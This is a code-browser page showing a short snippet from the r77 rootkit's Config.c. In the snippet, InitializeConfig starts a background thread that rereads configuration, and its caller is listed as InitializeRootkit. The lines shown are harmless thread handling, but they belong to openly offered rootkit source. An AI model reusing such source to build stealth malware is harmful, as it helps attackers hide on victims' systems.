MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / InitializeConfig

Function InitializeConfig

r77/Config.c:7–11  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

5static PR77_CONFIG Configuration;
6
7VOID InitializeConfig()
8{
9 // The configuration is read periodically in a background thread.
10 ConfigThread = CreateThread(NULL, 0, UpdateConfigThread, NULL, 0, NULL);
11}
12VOID UninitializeConfig()
13{
14 TerminateThread(ConfigThread, 0);

Callers 1

InitializeRootkitFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected